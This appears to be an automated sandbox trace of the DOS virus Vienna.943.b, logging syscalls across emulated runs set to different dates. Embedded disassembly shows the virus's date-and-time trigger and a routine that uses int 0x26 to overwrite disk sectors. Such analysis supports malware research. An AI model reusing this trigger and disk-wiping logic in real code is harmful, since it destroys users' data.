Sample viewer

vx.netlux.org/Virus.DOS.Vienna.943.b

.

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-17T23:01:26.252398167Z	23	PC: 13e46 \| Rename file
2018-12-17T23:01:26.255082461Z	48	PC: 13e66 \| Get DOS version
2018-12-17T23:01:26.256404826Z	44	PC: 13e72 \| Get time 0x13e72: xor bx, bx 0x13e74: cmp dl, 4 0x13e77: jle 0x13e7b 0x13e79: jmp 0x13e8d 0x13e7b: mov dl, byte ptr [bx + si + 0x8f] 0x13e7f: or dl, dl 0x13e81: je 0x13e8d 0x13e83: sub dl, 0x4b 0x13e86: mov ah, 2 0x13e88: int 0x21 0x13e8a: inc bx 0x13e8b: jmp 0x13e7b 0x13e8d: mov ah, 0x2a 0x13e8f: int 0x21 0x13e91: cmp dh, 3 0x13e94: jne 0x13ed6 0x13e96: cmp dl, 0x18 0x13e99: jne 0x13ed6 0x13e9b: mov ah, 0x2c 0x13e9d: int 0x21
2018-12-17T23:01:26.258722742Z	42	PC: 13e91 \| Get date 0x13e91: cmp dh, 3 0x13e94: jne 0x13ed6 0x13e96: cmp dl, 0x18 0x13e99: jne 0x13ed6 0x13e9b: mov ah, 0x2c 0x13e9d: int 0x21 0x13e9f: cmp ch, 7 0x13ea2: jne 0x13ed6 0x13ea4: cmp cl, 0x2d 0x13ea7: jne 0x13ed6 0x13ea9: xor bx, bx 0x13eab: mov dl, byte ptr [bx + si + 0xf1] 0x13eaf: or dl, dl 0x13eb1: je 0x13ebd 0x13eb3: sub dl, 0x4b 0x13eb6: mov ah, 2 0x13eb8: int 0x21 0x13eba: inc bx 0x13ebb: jmp 0x13eab 0x13ebd: mov al, 0
2018-12-17T23:01:26.261022023Z	47	PC: 13edb \| Get disk transfer address
2018-12-17T23:01:26.263531238Z	26	PC: 13ef0 \| Set disk transfer address
2018-12-17T23:01:26.265411601Z	78	PC: 13f84 \| Find first file
2018-12-17T23:01:26.267942857Z	78	PC: 13f84 \| Find first file
2018-12-17T23:01:26.274091571Z	26	PC: 140a0 \| Set disk transfer address

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":13871,"SideJobID":0}

.

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T12:39:14.481655099Z	23	PC: 13e46 \| Rename file
2018-12-25T12:39:14.48440639Z	48	PC: 13e66 \| Get DOS version
2018-12-25T12:39:14.485800533Z	44	PC: 13e72 \| Get time 0x13e72: xor bx, bx 0x13e74: cmp dl, 4 0x13e77: jle 0x13e7b 0x13e79: jmp 0x13e8d 0x13e7b: mov dl, byte ptr [bx + si + 0x8f] 0x13e7f: or dl, dl 0x13e81: je 0x13e8d 0x13e83: sub dl, 0x4b 0x13e86: mov ah, 2 0x13e88: int 0x21 0x13e8a: inc bx 0x13e8b: jmp 0x13e7b 0x13e8d: mov ah, 0x2a 0x13e8f: int 0x21 0x13e91: cmp dh, 3 0x13e94: jne 0x13ed6 0x13e96: cmp dl, 0x18 0x13e99: jne 0x13ed6 0x13e9b: mov ah, 0x2c 0x13e9d: int 0x21
2018-12-25T12:39:14.488112597Z	42	PC: 13e91 \| Get date 0x13e91: cmp dh, 3 0x13e94: jne 0x13ed6 0x13e96: cmp dl, 0x18 0x13e99: jne 0x13ed6 0x13e9b: mov ah, 0x2c 0x13e9d: int 0x21 0x13e9f: cmp ch, 7 0x13ea2: jne 0x13ed6 0x13ea4: cmp cl, 0x2d 0x13ea7: jne 0x13ed6 0x13ea9: xor bx, bx 0x13eab: mov dl, byte ptr [bx + si + 0xf1] 0x13eaf: or dl, dl 0x13eb1: je 0x13ebd 0x13eb3: sub dl, 0x4b 0x13eb6: mov ah, 2 0x13eb8: int 0x21 0x13eba: inc bx 0x13ebb: jmp 0x13eab 0x13ebd: mov al, 0
2018-12-25T12:39:14.490487996Z	47	PC: 13edb \| Get disk transfer address
2018-12-25T12:39:14.491509258Z	26	PC: 13ef0 \| Set disk transfer address
2018-12-25T12:39:14.492663228Z	78	PC: 13f84 \| Find first file
2018-12-25T12:39:14.494558067Z	78	PC: 13f84 \| Find first file (See above)
2018-12-25T12:39:14.499078589Z	26	PC: 140a0 \| Set disk transfer address

{"DateBased":true,"Day":1,"Month":3,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":13871,"SideJobID":0}

.

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T12:39:14.496644422Z	23	PC: 13e46 \| Rename file
2018-12-25T12:39:14.499054381Z	48	PC: 13e66 \| Get DOS version
2018-12-25T12:39:14.500067693Z	44	PC: 13e72 \| Get time 0x13e72: xor bx, bx 0x13e74: cmp dl, 4 0x13e77: jle 0x13e7b 0x13e79: jmp 0x13e8d 0x13e7b: mov dl, byte ptr [bx + si + 0x8f] 0x13e7f: or dl, dl 0x13e81: je 0x13e8d 0x13e83: sub dl, 0x4b 0x13e86: mov ah, 2 0x13e88: int 0x21 0x13e8a: inc bx 0x13e8b: jmp 0x13e7b 0x13e8d: mov ah, 0x2a 0x13e8f: int 0x21 0x13e91: cmp dh, 3 0x13e94: jne 0x13ed6 0x13e96: cmp dl, 0x18 0x13e99: jne 0x13ed6 0x13e9b: mov ah, 0x2c 0x13e9d: int 0x21
2018-12-25T12:39:14.502156003Z	42	PC: 13e91 \| Get date 0x13e91: cmp dh, 3 0x13e94: jne 0x13ed6 0x13e96: cmp dl, 0x18 0x13e99: jne 0x13ed6 0x13e9b: mov ah, 0x2c 0x13e9d: int 0x21 0x13e9f: cmp ch, 7 0x13ea2: jne 0x13ed6 0x13ea4: cmp cl, 0x2d 0x13ea7: jne 0x13ed6 0x13ea9: xor bx, bx 0x13eab: mov dl, byte ptr [bx + si + 0xf1] 0x13eaf: or dl, dl 0x13eb1: je 0x13ebd 0x13eb3: sub dl, 0x4b 0x13eb6: mov ah, 2 0x13eb8: int 0x21 0x13eba: inc bx 0x13ebb: jmp 0x13eab 0x13ebd: mov al, 0
2018-12-25T12:39:14.505278896Z	47	PC: 13edb \| Get disk transfer address
2018-12-25T12:39:14.506381423Z	26	PC: 13ef0 \| Set disk transfer address
2018-12-25T12:39:14.507478239Z	78	PC: 13f84 \| Find first file
2018-12-25T12:39:14.509272846Z	78	PC: 13f84 \| Find first file (See above)
2018-12-25T12:39:14.514639703Z	26	PC: 140a0 \| Set disk transfer address

{"DateBased":true,"Day":24,"Month":3,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":13871,"SideJobID":0}

.

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T12:39:14.919712316Z	23	PC: 13e46 \| Rename file
2018-12-25T12:39:14.921859712Z	48	PC: 13e66 \| Get DOS version
2018-12-25T12:39:14.923247549Z	44	PC: 13e72 \| Get time 0x13e72: xor bx, bx 0x13e74: cmp dl, 4 0x13e77: jle 0x13e7b 0x13e79: jmp 0x13e8d 0x13e7b: mov dl, byte ptr [bx + si + 0x8f] 0x13e7f: or dl, dl 0x13e81: je 0x13e8d 0x13e83: sub dl, 0x4b 0x13e86: mov ah, 2 0x13e88: int 0x21 0x13e8a: inc bx 0x13e8b: jmp 0x13e7b 0x13e8d: mov ah, 0x2a 0x13e8f: int 0x21 0x13e91: cmp dh, 3 0x13e94: jne 0x13ed6 0x13e96: cmp dl, 0x18 0x13e99: jne 0x13ed6 0x13e9b: mov ah, 0x2c 0x13e9d: int 0x21
2018-12-25T12:39:14.925553003Z	42	PC: 13e91 \| Get date 0x13e91: cmp dh, 3 0x13e94: jne 0x13ed6 0x13e96: cmp dl, 0x18 0x13e99: jne 0x13ed6 0x13e9b: mov ah, 0x2c 0x13e9d: int 0x21 0x13e9f: cmp ch, 7 0x13ea2: jne 0x13ed6 0x13ea4: cmp cl, 0x2d 0x13ea7: jne 0x13ed6 0x13ea9: xor bx, bx 0x13eab: mov dl, byte ptr [bx + si + 0xf1] 0x13eaf: or dl, dl 0x13eb1: je 0x13ebd 0x13eb3: sub dl, 0x4b 0x13eb6: mov ah, 2 0x13eb8: int 0x21 0x13eba: inc bx 0x13ebb: jmp 0x13eab 0x13ebd: mov al, 0
2018-12-25T12:39:14.928893135Z	44	PC: 13e9f \| Get time 0x13e9f: cmp ch, 7 0x13ea2: jne 0x13ed6 0x13ea4: cmp cl, 0x2d 0x13ea7: jne 0x13ed6 0x13ea9: xor bx, bx 0x13eab: mov dl, byte ptr [bx + si + 0xf1] 0x13eaf: or dl, dl 0x13eb1: je 0x13ebd 0x13eb3: sub dl, 0x4b 0x13eb6: mov ah, 2 0x13eb8: int 0x21 0x13eba: inc bx 0x13ebb: jmp 0x13eab 0x13ebd: mov al, 0 0x13ebf: mov cx, 0xff 0x13ec2: mov dx, 1 0x13ec5: int 0x26 0x13ec7: jb 0x13ecc 0x13ec9: add sp, 2 0x13ecc: inc al
2018-12-25T12:39:14.931114966Z	47	PC: 13edb \| Get disk transfer address
2018-12-25T12:39:14.932121145Z	26	PC: 13ef0 \| Set disk transfer address
2018-12-25T12:39:14.933820861Z	78	PC: 13f84 \| Find first file
2018-12-25T12:39:14.935743451Z	78	PC: 13f84 \| Find first file (See above)
2018-12-25T12:39:14.939754383Z	26	PC: 140a0 \| Set disk transfer address